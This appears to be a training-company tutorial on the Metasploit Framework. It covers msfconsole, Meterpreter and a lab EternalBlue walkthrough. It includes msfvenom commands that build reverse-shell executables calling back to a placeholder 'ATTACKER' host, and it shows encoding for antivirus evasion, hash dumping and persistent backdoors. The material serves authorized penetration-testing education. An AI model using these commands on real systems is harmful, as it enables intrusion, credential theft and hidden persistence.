Metasploit Framework: From Basics to Advanced Exploitation

# Metasploit Framework: From Basics to Advanced Exploitation

Introduction to Metasploit

The Metasploit Framework represents the most powerful and widely-used exploitation framework in the cybersecurity industry. Originally created by H.D. Moore in 2003 and now maintained by Rapid7, Metasploit provides security professionals with a comprehensive platform for vulnerability research, exploit development, and penetration testing.

This complete guide covers everything from basic msfconsole commands to advanced meterpreter techniques, enabling you to leverage Metasploit's full potential for authorized security testing.

Understanding Metasploit Architecture

Core Components

The Framework Core provides the foundation managing modules, sessions, and plugins. Modules are self-contained pieces of code performing specific tasks. Interfaces include msfconsole, msfgui, and Armitage. Libraries provide shared code for network protocols and encoding.

Module Types

• Exploit modules take advantage of vulnerabilities to gain access
• Payload modules execute after successful exploitation (singles, stagers, stages)
• Auxiliary modules support scanning, fuzzing, and information gathering
• Post modules handle post-exploitation tasks like privilege escalation
• Encoder modules obfuscate payloads for antivirus evasion
• NOP modules generate reliable shellcode trampolines

Installing Metasploit

Metasploit comes pre-installed on Kali Linux. Start it with msfconsole. If not installed, update and install with sudo apt update && sudo apt install metasploit-framework.

Enable the PostgreSQL database for improved session management with sudo msfdb init.

Mastering msfconsole

Basic Commands

Use help to display help information. Use search to find modules with syntax like search type:exploit name:smb or search cve:2017-0144. Use info to display module information. Use show options to display available options. Use exploit to execute the exploit.

Database Integration Commands

Use workspace -a pentest to create workspace. Use db_nmap -sV -p- 192.168.1.0/24 to scan targets with Nmap and store in database. Use hosts to view discovered hosts. Use services to view discovered services.

Session Management

Use sessions to list active sessions. Use sessions -i 1 to interact with specific session. Use background to background current session.

Working with Exploit Modules

Finding the Right Exploit

Search exploits by keyword, CVE number, or target:

• search type:exploit name:buffer overflow
• search cve:2021-44228
• search platform:windows

Configuring Exploit Options

Set required options like RHOSTS, RPORT, LHOST, and LPORT. Use show targets to view available targets and set TARGET to choose specific target.

Payload Configuration

Understanding Payload Types

Singles (Inline) are self-contained payloads that do not require download. Stagers establish connection and download the next stage. Stages are downloaded by stagers and provide advanced functionality like Meterpreter.

Common Payloads

• windows/x64/meterpreter/reverse_tcp for Windows Meterpreter reverse TCP
• linux/x86/meterpreter/reverse_tcp for Linux reverse shell
• php/meterpreter/reverse_tcp for PHP Meterpreter
• java/meterpreter/reverse_tcp for staged payload for Java

Meterpreter: Advanced Post-Exploitation

Meterpreter provides powerful post-exploitation capabilities with stealth features and extensive functionality.

Core Meterpreter Commands

Use sysinfo for system information. Use getuid to display current user. Use ps to list running processes. Use migrate PID to migrate to different process. Use shell for interactive command shell. Use hashdump to dump password hashes.

File System Operations

Use download to download files and upload to upload files. Use pwd and ls to navigate and list files. Use cd to change directory.

Privilege Escalation

Use getsystem to try automatic privilege escalation. Use getprivs to check available privileges. Use migrate to migrate to higher privilege process.

Msfvenom: Standalone Payload Generation

Msfvenom generates standalone payloads outside of msfconsole for delivery in various formats.

Basic Payload Generation

• Windows executable: msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe
• Linux ELF binary: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf
• PHP payload: msfvenom -p php/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw -o shell.php

Advanced Msfvenom Options

Encode payload multiple times with msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe. Use custom executable as template with msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER -x calc.exe -k -f exe -o payload.exe.

Handler Configuration

Configure listeners for payloads generated with Msfvenom using exploit/multi/handler with appropriate payload, LHOST, and LPORT settings. Use set ExitOnSession false and exploit -j to run in background.

Practical Exploitation Walkthrough

Scenario: Exploiting Windows SMB (EternalBlue)

Lab Setup includes Kali Linux as attacker (192.168.1.50), Windows 7 target (192.168.1.100), and same network segment.

Step 1: Network Scan with db_nmap -sS -sV -p 445 192.168.1.0/24 to find systems with SMB service.

Step 2: Search for exploit with search type:exploit name:ms17-010.

Step 3: Configure exploit with use exploit/windows/smb/ms17_010_eternalblue, set RHOSTS, set PAYLOAD, set LHOST, and set LPORT.

Step 4: Execute with exploit.

Step 5: Post-exploitation using Meterpreter commands like sysinfo, getuid, hashdump, and shell.

Best Practices for Metasploit Usage

Always work within authorized scope. Document all actions for reporting. Use databases to maintain organized data. Test exploits in lab environments first. Understand payloads before deployment. Stay updated with new modules. Combine with manual techniques for comprehensive testing.

Frequently Asked Questions

How do I start Metasploit on Kali Linux?

Run msfconsole in the terminal. If using a database, ensure PostgreSQL is running with sudo msfdb init before starting.

What is the difference between Meterpreter and regular payloads?

Meterpreter runs in memory, provides extensive post-exploitation capabilities, and can be extended with scripts. Regular command shells are simpler but less powerful.

How do I create a persistent backdoor?

Use Meterpreter persistence script: run persistence -h for options, or create a scheduled task for persistence after compromise.

Can Metasploit evade antivirus?

Metasploit payloads can be encoded and obfuscated, but dedicated antivirus solutions often detect them. Advanced evasion requires custom development or frameworks like Veil-Evasion.

How do I handle NAT environments?

Use reverse shell payloads that connect from the target back to your attacker machine. Ensure your attacker IP is reachable from the target network.

Conclusion

The Metasploit Framework is an indispensable tool for ethical hackers and penetration testers. This comprehensive guide has covered everything from basic msfconsole commands to advanced exploitation techniques.

Mastering Metasploit requires practice. Work through vulnerable lab environments like Metasploitable and DVWA to build hands-on experience with different exploit scenarios.

Remember that powerful tools come with responsibility. Always work within authorized boundaries, document your activities thoroughly, and use your skills to improve organizational security.

Cyber Defence offers extensive Metasploit training as part of our comprehensive ethical hacking courses. Learn exploitation techniques through practical labs and real-world scenarios.

Start building your Metasploit expertise today. Your journey to becoming a skilled penetration tester begins here.